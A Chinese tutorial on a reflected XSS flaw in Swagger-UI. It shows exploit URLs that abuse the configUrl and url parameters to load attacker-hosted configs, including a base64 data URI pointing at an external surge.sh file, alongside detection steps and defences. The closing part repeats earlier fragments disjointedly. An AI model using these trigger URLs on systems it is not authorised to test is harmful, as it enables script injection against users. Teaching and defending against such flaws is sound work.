Swagger-UI 反射型 XSS 漏洞分析与利用教学文档<\/h1>

一、Swagger-UI 简介<\/h2>

Swagger-UI 是一个开源项目，提供了一个直观的用户界面来查看API文档，并允许用户直接从文档中发送请求、查看响应，从而测试和调试API。<\/p>

主要功能：<\/p>

API文档可视化展示<\/li>
交互式API测试<\/li>

支持多种API规范<\/li> <\/ul>

入口页面通常为：swagger-ui.html<\/code><\/p>

二、漏洞概述<\/h2>
漏洞类型<\/h3>
反射型跨站脚本攻击(XSS)<\/p>
影响版本<\/h3>
多个版本的Swagger-UI存在此漏洞，可通过JSON.stringify(versions)<\/code>命令查询当前版本<\/p>
漏洞原理<\/h3>
Swagger-UI允许通过URL参数动态加载配置文件和API文档，但未对输入进行充分验证和过滤，导致攻击者可以注入恶意脚本。<\/p>
三、漏洞利用参数<\/h2>
1. configUrl 参数<\/h3>
用于指定Swagger UI配置文件的URL<\/p>
示例：<\/p>
\/swagger-ui.html?configUrl=https:\/\/example.com\/test.json
<\/code><\/pre>
2. url 参数<\/h3>
直接指定API文档的URL<\/p>
示例：<\/p>
\/swagger-ui.html?url=https:\/\/example.com\/test.yaml
<\/code><\/pre>
四、漏洞利用步骤<\/h2>
1. 准备恶意配置文件<\/h3>
创建一个JSON格式的配置文件(test.json)，内容如下：<\/p>
{
<\/span><\/span>  "url"<\/span>: "https:\/\/example.com\/test.yaml"<\/span>,
<\/span><\/span>  "urls"<\/span>: [
<\/span><\/span>    {
<\/span><\/span>      "url"<\/span>: "https:\/\/example.com\/test.yaml"<\/span>,
<\/span><\/span>      "name"<\/span>: "Foo"<\/span>
<\/span><\/span>    }
<\/span><\/span>  ]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 准备恶意API文档<\/h3>
创建一个YAML格式的API文档(test.yaml)，其中包含XSS payload<\/p>
3. 触发漏洞的方式<\/h3>
方式一：通过外部配置文件<\/h4>
\/swagger-ui.html?configUrl=https:\/\/example.com\/test.json
<\/code><\/pre>
方式二：直接指定API文档<\/h4>
\/swagger-ui.html?url=https:\/\/example.com\/test.yaml
<\/code><\/pre>
方式三：使用data URI方案<\/h4>
\/swagger-ui.html?configUrl=data:text\/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
<\/code><\/pre>
五、漏洞检测方法<\/h2>

检查Swagger-UI是否存在未授权访问<\/li>
尝试通过configUrl<\/code>或url<\/code>参数加载外部资源<\/li>
在控制台输入JSON.stringify(versions)<\/code>查询当前版本<\/li>
<\/ol>
六、防御措施<\/h2>


输入验证<\/strong>：<\/p>

对configUrl<\/code>和url<\/code>参数进行严格验证<\/li>
限制只允许加载可信域的配置文件<\/li>
<\/ul>
<\/li>

输出编码<\/strong>：<\/p>

对所有动态内容进行适当的HTML编码<\/li>
<\/ul>
<\/li>

内容安全策略(CSP)<\/strong>：<\/p>

实施严格的内容安全策略，限制外部脚本加载<\/li>
<\/ul>
<\/li>

版本更新<\/strong>：<\/p>

及时更新到最新版本的Swagger-UI<\/li>
<\/ul>
<\/li>

访问控制<\/strong>：<\/p>

对Swagger-UI页面实施身份验证<\/li>
限制内网访问或特定IP访问<\/li>
<\/ul>
<\/li>
<\/ol>
七、实际应用场景<\/h2>

当发现Swagger-UI未授权访问时，可尝试利用此XSS漏洞<\/li>
在内网渗透测试中，可用于绕过某些安全限制<\/li>
可作为漏洞链的一部分，与其他漏洞结合利用<\/li>
<\/ol>
八、注意事项<\/h2>

漏洞利用需要目标系统能够访问攻击者控制的服务器<\/li>
某些网络环境可能限制外部资源加载<\/li>
实际利用前应先确认目标版本是否受影响<\/li>
合法渗透测试需获得授权<\/li>
<\/ol>
九、参考资源<\/h2>

Swagger-UI安全公告：https:\/\/security.snyk.io\/package\/npm\/swagger-ui<\/li>
示例配置文件托管服务：https:\/\/surge.sh\/<\/li>
<\/ol>

Swagger-UI 反射型 XSS 漏洞分析与利用教学文档<\/h1>

漏洞类型<\/h3> 反射型跨站脚本攻击(XSS)<\/p>

影响版本<\/h3> 多个版本的Swagger-UI存在此漏洞，可通过JSON.stringify(versions)<\/code>命令查询当前版本<\/p>

三、漏洞利用参数<\/h2>

四、漏洞利用步骤<\/h2>

2. 准备恶意API文档<\/h3> 创建一个YAML格式的API文档(test.yaml)，其中包含XSS payload<\/p>

3. 触发漏洞的方式<\/h3>

九、参考资源<\/h2> Swagger-UI安全公告：https:\/\/security.snyk.io\/package\/npm\/swagger-ui<\/li> 示例配置文件托管服务：https:\/\/surge.sh\/<\/li> <\/ol>

漏洞类型<\/h3>
反射型跨站脚本攻击(XSS)<\/p>

影响版本<\/h3>
多个版本的Swagger-UI存在此漏洞，可通过`JSON.stringify(versions)<\/code>命令查询当前版本<\/p>`

2. 准备恶意API文档<\/h3>
创建一个YAML格式的API文档(test.yaml)，其中包含XSS payload<\/p>

九、参考资源<\/h2>

Swagger-UI安全公告：https:\/\/security.snyk.io\/package\/npm\/swagger-ui<\/li>
示例配置文件托管服务：https:\/\/surge.sh\/<\/li> <\/ol>